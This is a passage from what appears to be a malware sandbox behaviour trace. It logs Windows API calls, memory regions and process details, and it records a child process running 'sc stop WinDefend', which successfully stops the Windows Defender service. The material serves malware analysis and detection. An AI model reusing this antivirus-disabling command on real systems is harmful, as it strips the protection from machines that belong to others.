lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0153.078] GetLastError () returned 0xcb [0153.082] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.083] GetLastError () returned 0xcb [0153.083] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0153.083] GetLastError () returned 0xcb [0153.083] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0153.083] GetLastError () returned 0xcb [0153.083] CloseHandle (hObject=0x77) returned 1 [0153.084] GetLastError () returned 0xcb [0153.088] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.088] GetLastError () returned 0xcb [0153.088] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0153.088] GetLastError () returned 0xcb [0153.088] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1 [0153.088] GetLastError () returned 0xcb [0153.089] CloseHandle (hObject=0x77) returned 1 [0153.089] GetLastError () returned 0xcb [0153.093] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.130] GetLastError () returned 0xcb [0153.130] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x5d8ea3c | out: lpMode=0x5d8ea3c) returned 1 [0153.131] GetLastError () returned 0xcb [0153.131] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x2e9bb04*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x5d8ea3c, lpReserved=0x0 | out: lpBuffer=0x2e9bb04*, lpNumberOfCharsWritten=0x5d8ea3c*=0x36) returned 1 [0153.131] GetLastError () returned 0xcb [0153.131] CloseHandle (hObject=0x77) returned 1 [0153.131] GetLastError () returned 0xcb [0153.135] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.136] GetLastError () returned 0xcb [0153.136] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0153.136] GetLastError () returned 0xcb [0153.136] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0153.136] GetLastError () returned 0xcb [0153.136] CloseHandle (hObject=0x77) returned 1 [0153.136] GetLastError () returned 0xcb [0153.140] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.141] GetLastError () returned 0xcb [0153.141] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0153.141] GetLastError () returned 0xcb [0153.141] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1 [0153.141] GetLastError () returned 0xcb [0153.141] CloseHandle (hObject=0x77) returned 1 [0153.141] GetLastError () returned 0xcb [0153.146] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.146] GetLastError () returned 0xcb [0153.146] GetConsoleMode (in: hConsoleHandle=0x77, lpMode=0x5d8ea7c | out: lpMode=0x5d8ea7c) returned 1 [0153.146] GetLastError () returned 0xcb [0153.146] WriteConsoleW (in: hConsoleOutput=0x77, lpBuffer=0x2bd9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5d8ea7c, lpReserved=0x0 | out: lpBuffer=0x2bd9938*, lpNumberOfCharsWritten=0x5d8ea7c*=0x1) returned 1 [0153.147] GetLastError () returned 0xcb [0153.147] CloseHandle (hObject=0x77) returned 1 [0153.148] GetLastError () returned 0xcb [0153.152] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0153.152] GetLastError () returned 0xcb [0153.152] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x5d8ea48 | out: lpConsoleScreenBufferInfo=0x5d8ea48) returned 1 [0153.152] GetLastError () returned 0xcb [0153.152] GetConsoleOutputCP () returned 0x1b5 [0153.153] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x5d8ea50, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x5d8ea50) returned 0 [0153.153] GetLastError () returned 0xcb [0153.157] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b [0153.157] GetLastError () returned 0xcb [0153.157] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0153.158] GetLastError () returned 0xcb [0153.162] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f [0153.162] GetLastError () returned 0xcb [0153.162] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x5d8e9e8 | out: lpConsoleScreenBufferInfo=0x5d8e9e8) returned 1 [0153.162] GetLastError () returned 0xcb [0153.167] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.203] GetLastError () returned 0xcb [0153.203] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0153.203] GetLastError () returned 0xcb [0153.204] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0153.204] GetLastError () returned 0xcb [0153.204] CloseHandle (hObject=0x83) returned 1 [0153.204] GetLastError () returned 0xcb [0153.208] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.208] GetLastError () returned 0xcb [0153.208] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5d8e9f0 | out: lpConsoleScreenBufferInfo=0x5d8e9f0) returned 1 [0153.208] GetLastError () returned 0xcb [0153.208] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1 [0153.209] GetLastError () returned 0xcb [0153.209] CloseHandle (hObject=0x83) returned 1 [0153.209] GetLastError () returned 0xcb [0153.213] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.214] GetLastError () returned 0xcb [0153.214] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x5d8ea3c | out: lpMode=0x5d8ea3c) returned 1 [0153.214] GetLastError () returned 0xcb [0153.214] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x2e9befc*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5d8ea3c, lpReserved=0x0 | out: lpBuffer=0x2e9befc*, lpNumberOfCharsWritten=0x5d8ea3c*=0x1) returned 1 [0153.214] GetLastError () returned 0xcb [0153.214] CloseHandle (hObject=0x83) returned 1 [0153.214] GetLastError () returned 0xcb [0153.219] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.219] GetLastError () returned 0xcb [0153.219] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0153.219] GetLastError () returned 0xcb [0153.219] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0153.220] GetLastError () returned 0xcb [0153.220] CloseHandle (hObject=0x83) returned 1 [0153.220] GetLastError () returned 0xcb [0153.224] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.224] GetLastError () returned 0xcb [0153.224] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x5d8e9ec | out: lpConsoleScreenBufferInfo=0x5d8e9ec) returned 1 [0153.225] GetLastError () returned 0xcb [0153.225] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0x7) returned 1 [0153.225] GetLastError () returned 0xcb [0153.225] CloseHandle (hObject=0x83) returned 1 [0153.225] GetLastError () returned 0xcb [0153.229] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0153.230] GetLastError () returned 0xcb [0153.230] GetConsoleMode (in: hConsoleHandle=0x83, lpMode=0x5d8ea7c | out: lpMode=0x5d8ea7c) returned 1 [0153.230] GetLastError () returned 0xcb [0153.230] WriteConsoleW (in: hConsoleOutput=0x83, lpBuffer=0x2bd9938*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x5d8ea7c, lpReserved=0x0 | out: lpBuffer=0x2bd9938*, lpNumberOfCharsWritten=0x5d8ea7c*=0x1) returned 1 [0153.230] GetLastError () returned 0xcb [0153.230] CloseHandle (hObject=0x83) returned 1 [0153.230] GetLastError () returned 0xcb [0153.234] SetEvent (hEvent=0x324) returned 1 [0153.234] GetLastError () returned 0xcb [0153.234] SetEvent (hEvent=0x34c) returned 1 [0153.234] GetLastError () returned 0xcb [0153.234] SetEvent (hEvent=0x31c) returned 1 [0153.235] GetLastError () returned 0xcb [0153.235] SetEvent (hEvent=0x3b8) returned 1 [0153.235] GetLastError () returned 0xcb [0153.235] SetEvent (hEvent=0x358) returned 1 [0153.235] GetLastError () returned 0xcb [0153.235] SetEvent (hEvent=0x340) returned 1 [0153.235] GetLastError () returned 0xcb [0153.235] SetEvent (hEvent=0x350) returned 1 [0153.235] GetLastError () returned 0xcb [0153.235] SetEvent (hEvent=0x354) returned 1 [0153.235] GetLastError () returned 0xcb [0153.235] SetEvent (hEvent=0x35c) returned 1 [0153.235] GetLastError () returned 0xcb [0153.235] CoUninitialize () Thread: id = 213 os_tid = 0x294 [0153.310] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0153.331] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.332] VirtualQuery (in: lpAddress=0x6a6de80, lpBuffer=0x6a6ee80, dwLength=0x1c | out: lpBuffer=0x6a6ee80*(BaseAddress=0x6a6d000, AllocationBase=0x60e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.332] VirtualQuery (in: lpAddress=0x6a6df9c, lpBuffer=0x6a6ef9c, dwLength=0x1c | out: lpBuffer=0x6a6ef9c*(BaseAddress=0x6a6d000, AllocationBase=0x60e0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.399] SetEvent (hEvent=0x390) returned 1 [0153.399] GetLastError () returned 0x0 [0153.399] SetEvent (hEvent=0x394) returned 1 [0153.399] GetLastError () returned 0x0 [0153.399] SetEvent (hEvent=0x3ac) returned 1 [0153.399] GetLastError () returned 0x0 [0153.399] SetEvent (hEvent=0x390) returned 1 [0153.399] GetLastError () returned 0x0 [0153.399] SetEvent (hEvent=0x394) returned 1 [0153.400] GetLastError () returned 0x0 [0153.400] SetEvent (hEvent=0x3dc) returned 1 [0153.400] GetLastError () returned 0x0 [0153.400] SetEvent (hEvent=0x3d0) returned 1 [0153.400] GetLastError () returned 0x0 [0153.400] SetEvent (hEvent=0x3d4) returned 1 [0153.400] GetLastError () returned 0x0 [0153.400] SetEvent (hEvent=0x3d8) returned 1 [0153.400] GetLastError () returned 0x0 [0153.400] SetEvent (hEvent=0x3e0) returned 1 [0153.410] GetLastError () returned 0x0 [0153.410] CoUninitialize () Process: id = "23" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x4319d000" os_pid = "0xb74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x874" cmd_line = "sc stop WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7e8" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2808 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2809 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2810 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2811 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2812 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2813 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 2814 start_va = 0x260000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2815 start_va = 0xda0000 end_va = 0xdabfff entry_point = 0xda0000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 2816 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2817 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2818 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2819 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2820 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2821 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2822 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2823 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2824 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2825 start_va = 0x80000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2826 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2827 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2828 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2829 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2830 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2831 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2832 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 2833 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 2834 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2835 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2836 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2837 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2838 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2839 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2840 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2841 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2842 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 2843 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 2844 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2845 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2887 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2888 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2889 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x100000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 157 os_tid = 0xb80 [0128.981] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29fa24 | out: lpSystemTimeAsFileTime=0x29fa24*(dwLowDateTime=0xef6010d0, dwHighDateTime=0x1d4be3a)) [0128.981] GetCurrentProcessId () returned 0xb74 [0128.981] GetCurrentThreadId () returned 0xb80 [0128.981] GetTickCount () returned 0x2cba7 [0128.981] QueryPerformanceCounter (in: lpPerformanceCount=0x29fa1c | out: lpPerformanceCount=0x29fa1c*=1820635300000) returned 1 [0128.981] GetModuleHandleA (lpModuleName=0x0) returned 0xda0000 [0128.981] __set_app_type (_Type=0x1) [0128.981] __p__fmode () returned 0x75ca31f4 [0128.981] __p__commode () returned 0x75ca31fc [0128.981] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xda79c7) returned 0x0 [0128.981] __wgetmainargs (in: _Argc=0xda9020, _Argv=0xda9028, _Env=0xda9024, _DoWildCard=0, _StartInfo=0xda9034 | out: _Argc=0xda9020, _Argv=0xda9028, _Env=0xda9024) returned 0 [0128.982] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.035] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.035] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0129.035] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0129.035] _wcsicmp (_String1="stop", _String2="query") returned 2 [0129.035] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0129.035] _wcsicmp (_String1="stop", _String2="start") returned 14 [0129.035] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0129.035] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0129.035] _wcsicmp (_String1="stop", _String2="control") returned 16 [0129.035] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0129.035] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0129.035] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2bf698 [0129.038] OpenServiceW (hSCManager=0x2bf698, lpServiceName="WinDefend", dwDesiredAccess=0x20) returned 0x2bf5f8 [0129.039] ControlService (in: hService=0x2bf5f8, dwControl=0x1, lpServiceStatus=0x29f920 | out: lpServiceStatus=0x29f920*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x85, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0129.055] _itow (in: _Dest=0x20, _Radix=2750476 | out: _Dest=0x20) returned="20" [0129.055] _itow (in: _Dest=0x4, _Radix=2750524 | out: _Dest=0x4) returned="4" [0129.055] _itow (in: _Dest=0x0, _Radix=2750644 | out: _Dest=0x0) returned="0" [0129.055] _itow (in: _Dest=0x0, _Radix=2750620 | out: _Dest=0x0) returned="0" [0129.055] _itow (in: _Dest=0x0, _Radix=2750548 | out: _Dest=0x0) returned="0" [0129.055] _itow (in: _Dest=0x0, _Radix=2750500 | out: _Dest=0x0) returned="0" [0129.055] _itow (in: _Dest=0x0, _Radix=2750452 | out: _Dest=0x0) returned="0" [0129.055] _itow (in: _Dest=0x0, _Radix=2750572 | out: _Dest=0x0) returned="0" [0129.055] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x2f, dwLanguageId=0x0, lpBuffer=0x29f790, nSize=0x2, Arguments=0x29f7a0 | out: lpBuffer="㱨,\x01") returned 0x15d [0129.056] GetFileType (hFile=0x7) returned 0x2 [0129.057] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x29f764 | out: lpMode=0x29f764) returned 1 [0129.057] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2c3c68*, nNumberOfCharsToWrite=0x15d, lpNumberOfCharsWritten=0x29f780, lpReserved=0x0 | out: lpBuffer=0x2c3c68*, lpNumberOfCharsWritten=0x29f780*=0x15d) returned 1 [0129.058] LocalFree (hMem=0x2c3c68) returned 0x0 [0129.058] LocalFree (hMem=0x0) returned 0x0 [0129.058] CloseServiceHandle (hSCObject=0x2bf5f8) returned 1 [0129.058] CloseServiceHandle (hSCObject=0x2bf698) returned 1 [0129.082] exit (_Code=0) Thread: id = 159 os_tid = 0xb88 Process: id = "24" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x405ab000" os_pid = "0x808" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x368" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00064c64" [0xc000000f] Region: id = 2986 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2987 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2988 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2989 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2990 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2991 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2992 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2993 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2994 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2995 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 2996 start_va = 0x110000 end_va = 0x110fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 2997 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 2998 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2999 start_va = 0x300000 end_va = 0x3bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 3000 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 3001 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 3002 start_va = 0x4d0000 end_va = 0x657fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 3003 start_va = 